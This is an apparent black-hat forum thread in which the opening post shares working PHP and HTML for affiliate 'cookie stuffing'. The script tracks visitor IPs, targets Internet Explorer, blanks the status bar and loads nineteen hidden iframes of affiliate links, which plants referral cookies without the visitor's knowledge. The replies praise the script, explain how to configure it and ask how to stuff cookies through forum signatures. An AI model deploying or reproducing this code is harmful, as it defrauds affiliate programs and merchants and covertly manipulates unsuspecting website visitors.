+ Reply to Thread
Results 1 to 7 of 7
Affiliate Networks Thread, Dumping Cookies Using more than one Affiliate Link in BlackHat Money; Dump all of cookies on a user while they're browsing your website and hide the status bar. (Internet Explorer Only). ...
  1. #1
    SpyBoy Guest

    Default Dumping Cookies Using more than one Affiliate Link

    Dump all of cookies on a user while they're browsing your website and hide the status bar. (Internet Explorer Only). It will only do this once per visitor, but works well, just add this code php or into your webpage:

    HOW:
    PHP Code:

    <?

    $ip = $_SERVER['REMOTE_ADDR'];
    mysql_connect("LOCALHOST","DBUSERNAME", "DBPASSWORD");
    mysql_select_db("DBNAME");
    $resultx = mysql_query("SELECT * FROM ips WHERE ips = '$ip'");
    $nrowsx = mysql_num_rows($resultx);
    if ($nrowsx == 0) {
    mysql_query("INSERT INTO `DBNAME`.`ips` (`ips`) VALUES ('$ip')");

    #ALL aff links should be available on your website as decoys
    #Feel free to add any number of aff links below.
    #Theres no need to post more than one **** rover link

    if (eregi("MSIE",getenv("HTTP_USER_AGENT")) ||
    eregi("Internet Explorer",getenv("HTTP_USER_AGENT"))) {

    ?>

    <script> window.status=' ';</script>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>

    <?
    }
    }
    ?>

  2. #2
    Traviz is offline BlackHat VIP
    Join Date
    Oct 2009
    Posts
    174

    Default Re: Dumping Cookies Using more than one Affiliate Link

    nice snippet. I'll try this as soon as I sign up for some affiliate programs.

    Code:
    code your code with the code tag man.
    8-)
    Space For Rent.

  3. #3
    dhksw is offline BlackHat Novice
    Join Date
    Nov 2009
    Posts
    37

    Default

    which one is the best cookie stuffing script? any suggestion?

  4. #4
    razormouse is offline BlackHat VIP
    Join Date
    Nov 2009
    Posts
    146

    Default

    you can try to build up your posts and apply for a CS login here. After which if you feel that you have enough money and love the login here then try and be a vip to give back to spyboy.

  5. #5
    nicesurf is offline BlackHat Novice
    Join Date
    Jan 2010
    Posts
    17

    Default

    Do I have to change DBUSERNAME", "DBPASSWORD");
    mysql_select_db("DBNAME"); with my real ones ?



    Quote Originally Posted by SpyBoy View Post
    Dump all of cookies on a user while they're browsing your website and hide the status bar. (Internet Explorer Only). It will only do this once per visitor, but works well, just add this code php or into your webpage:

    HOW:
    PHP Code:

    <?

    $ip = $_SERVER['REMOTE_ADDR'];
    mysql_connect("LOCALHOST","DBUSERNAME", "DBPASSWORD");
    mysql_select_db("DBNAME");
    $resultx = mysql_query("SELECT * FROM ips WHERE ips = '$ip'");
    $nrowsx = mysql_num_rows($resultx);
    if ($nrowsx == 0) {
    mysql_query("INSERT INTO `DBNAME`.`ips` (`ips`) VALUES ('$ip')");

    #ALL aff links should be available on your website as decoys
    #Feel free to add any number of aff links below.
    #Theres no need to post more than one **** rover link

    if (eregi("MSIE",getenv("HTTP_USER_AGENT")) ||
    eregi("Internet Explorer",getenv("HTTP_USER_AGENT"))) {

    ?>

    <script> window.status=' ';</script>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>
    <iframe src="http://www.AFFLINK.com" style="display:none;"></iframe>

    <?
    }
    }
    ?>

  6. #6
    Tinus is offline BlackHat VIP
    Join Date
    Oct 2009
    Posts
    100

    Default

    Ye u have to change those with ur actual names.

  7. #7
    nicesurf is offline BlackHat Novice
    Join Date
    Jan 2010
    Posts
    17

    Default

    Quote Originally Posted by Tinus View Post
    Ye u have to change those with ur actual names.
    Thanks for your reply.

    What is the best way to stuff forum and can I put it in my signature area ?

+ Reply to Thread

Similar Threads

  1. Mask Affiliate link via PHP Jump Script - CPA
    By SpyBoy in forum BlackHat Scripts & Code
    Replies: 1
    Last Post: 12-25-2010, 12:37 AM
  2. SEO Link Pro
    By brayking in forum BH Downloads
    Replies: 22
    Last Post: 12-21-2009, 01:41 PM
  3. Replies: 1
    Last Post: 11-11-2009, 06:10 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts